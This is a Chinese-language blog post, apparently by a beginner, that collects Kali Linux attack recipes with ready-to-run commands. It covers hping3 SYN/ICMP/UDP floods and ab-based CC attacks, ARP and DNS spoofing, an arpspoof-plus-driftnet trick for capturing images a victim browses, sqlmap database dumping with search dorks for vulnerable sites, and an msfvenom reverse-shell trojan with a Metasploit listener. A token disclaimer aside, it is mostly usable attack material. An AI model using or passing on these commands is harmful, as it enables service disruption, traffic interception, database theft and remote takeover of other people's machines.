kali简单攻击汇总
声明: 本文只是想让你多了解一些东西,若你被请去喝茶,与我无瓜(当然凭我这一篇文章还到不了那个地步)。技术无罪,滥用技术的人才是魔鬼。
一、Dos攻击:
deny of service(拒绝服务攻击)
原理:发送大量报文使设备(路由器、交换机、服务器)崩溃停止服务
1.mac flood(交换机攻击)
方式:macof命令
原理:
交换机中有一张非常重要mac表,每当一个主机要求与交换机进行数据传输时,交换机会重新记录主机的mac地址到它的内部MAC地址表。macof命令会发送大量随机mac地址不停的申请数据传输,使得交换机无法正常转发报文。
2.dhcp flood
kali输入 yersinia -G——>选择Launch attack
3.SYN(tcp报文) flood:
可用于外网,莫轻易尝试!!!
方式:
hping3 --flood -S --rand-source(随机MAC地址) -p 9999 192.168.6.6(要攻击的IP)
原理:
正常情况下客户端与服务器建立连接需要进行三次握手四次挥手。
(1) 客户端向被攻击服务器发送一个包含SYN
(Synchronize即同步报文)标志的TCP报文建立第一次握手。
(2) 受害服务器在收到攻击者的SYN报文后,将返回一个SYN+ACK的报文,表示攻击者的请求被接受,同时TCP序号被加一,这样就同被攻击服务器建立了第二次握手.
(3) 攻击者也返回一个确认报文ACK给受害服务器,同样TCP序列号被加一,到此一个TCP连接完成,三次握手完成。
攻击时:
TCP连接的三次握手中,用户向服务器发送了SYN报文后断开连接,那么服务器在发出SYN+ACK应答报文后无法收到客户端的ACK报文的(第三次握手无法完成),服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间(半连接)后丢弃这个未完成的连接,用大量的客户端发起连接并断开,造成服务器资源被耗尽无法提供服务。
4.icmp flood
方式:
hping3 --rand-source(随机MAC地址) --icmp -d 1400(报文数据大小) --flood 192.168.6.6(要攻击的IP)
原理:
攻击者向一个子网的广播地址发送多个ICMP Echo请求数据包。并将源地址伪装成想要攻击的目标主机的地址。然后该子网上的所有主机均会对此ICMP Echo请求包作出答复,向被攻击的目标主机发送数据包,使此主机受到攻击,导致网络阻塞。
5.UDP flood
方式:
hping3 --rand-source(随机MAC地址) --udp -p 8000端口号) --flood 192.168.6.6(要攻击的IP)
原理:
因udp发送数据报文不需要建立连接,所以可以向对方直接发送大量udp报文是目标瘫痪。
6.CC(Challenge Collapsar)攻击(web压力测试),可用于外网。
方式:
ab -n 10000000(模拟用户数) -c 1000(一个用户点击次数) http://www.xxx.com(接网址)
原理:
模拟多用户多线程请求较为消耗CPU内存的URL。
二、DDOS攻击:
Distributed denial of service(分布式拒绝服务)
原理:
基于DOS,但单一的DoS攻击一般是采用一对一方式,DOS攻击外网服务器时,由于受到带宽限制,用户发送的超过带宽的数据会被运营商丢弃,所以也就无法实现攻击(服务器的带宽通常大于用户),而DDOS是使用一台源主机,借助成千上万台被入侵控制主机(肉鸡)向目标发起集体攻击,每一个攻击被控制主机都会向目标主机发送大量的服务请求数据包,这些数据包经过伪装,无法识别它的来源,而且这些数据包所请求的服务往往要消耗大量的系统资源,,就使得服务器资源耗尽。所以DDOS攻击是比较难防范的一种攻击方式
特点:
①在此过程中,源主机只用于向被控制机器发出攻击指令,并不参与攻击,很好的隐藏了自己。
②每一台机器都是发起正常的请求,使得攻击难以防范。
三、欺骗攻击:
1.arp欺骗
方式:
arpspoof -i eth0 -t 192.168.43.9 182.168.6.1
(-i 网卡 -t 目标ip 网关)
原理:
kali伪装网关,向受害者发送arp响应报文,受害者接受响应,把kali当作网关,要发往外网的数据发送给kali,kali再转发到外网。
拓展:抓取妹子相册(使用arp欺骗抓取目标ip所浏览网页中的图片)
方式:
(1)开启kali的路由转发功能(临时):
echo 1 > /proc/sys/net/ipv4/ip_forward
(2)进行arp欺骗:
arpspoof -i eth0 -t 192.168.6.9 182.168.6.1
(3)开启抓图:
driftnet -i eth0(eth0为kali所用网卡)
2.DNS欺骗
方式:
使用cain(windows平台,最好win7以前的版本)
原理: 访问网站时,客户机会发送一个DNS报文去请求网站域名对应的IP地址然后进行访问,这时我们可以利用arp欺骗,让客户机将DNS请求报文发送到我们,然后修改网站域名对应的IP地址并返回给客户机,客户机拿到地址就进行发包访问,所以他访问的是我们想让他看到的内容(我们的网站)。
注: 因现在大多使用https协议传输,使用SSL依靠证书验证,所以在进行DNS欺骗是经常会出现连接不安全的,不能访问的情况。但至少可以造成对方无法访问他想要访问的页面,或者我们可以找使用http协议的网站进行欺骗。
四、Sql注入:
方式: 使用kali的sqlmap
①寻找注入点并检测待攻击目标的各种参数和属性:
sqlmap -u "网站链接"
②扫描库(显示数据库):
sqlmap -u "网站链接" --dbs
③扫描表
sqlmap -u "网站链接" -D 数据库名 --tables
④扫描字段
sqlmap -u "网站链接" -D 数据库名 -T 表名 --columns
⑤显示内容(暴库):
sqlmap -u "网站链接" -D 数据库名 -T 表名 -C 字段 --dump
⑥如果显示的是md5加密乱码,可使用反MD5破解:
https://www.cmd5.com/
原理:
利用现有的攻击程序或软件,将sql命令注入到后台数据库引擎执行,并逐渐判断出数据库的类型、版本以及对方环境。然后利用攻击工具将数据库的内容显示出来。
拓展: 1.使用搜索引擎检索带有sql注入点的网站:inurl:.asp?=id=1、inurl:.php?=id=1
五、利用kali生成简单木马(后门程序)
方式:
①在终端运行命令生成木马:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.43.86 LPORT=4444 -f exe >meinu.exe
参数解释:
-p 要使用的payload
-f 输出格式
-o 输出地址,默认根目录
LHOST=192.168.43.86 LPORT=4444为kali的IP和端口号
启动metasploit framework并进行设置(以下命令均在metasploit framework中执行):
②选择模块
use exploit/multi/handler
③设置木马所使用的payload
set payload windows/meterpreter/reverse_tcp
④设置要建立会话的IP,即kali的IP
set LHOST 10.31.249.254
⑤设置要监听的端口,即生成木马时的端口:
set LPORT 4444
⑥开始监听:
exploit
⑦想办法让木马在目标主机主机运行上线即可建立连接。
成功入侵并获取到我的系统信息
注: ①木马程序并没有进行免杀处理,所以会被杀毒软件报毒(毕竟也不全是摆设T_T),实验前请退出杀毒软件或在虚拟机上进行。(已添加信任,还是会被火绒拦截,360和腾讯电脑管家添加信任即可)
②建立连接后进行提权可以实现几乎所有操作,在这里列出一些操作,想了解更多请自行百度
③后续仍面临免杀和后门持久化操作,在这里就不进行介绍,感兴趣的可以自行研究。
————————–本人小白一枚,大佬勿喷,有不足的地方欢迎指正—————————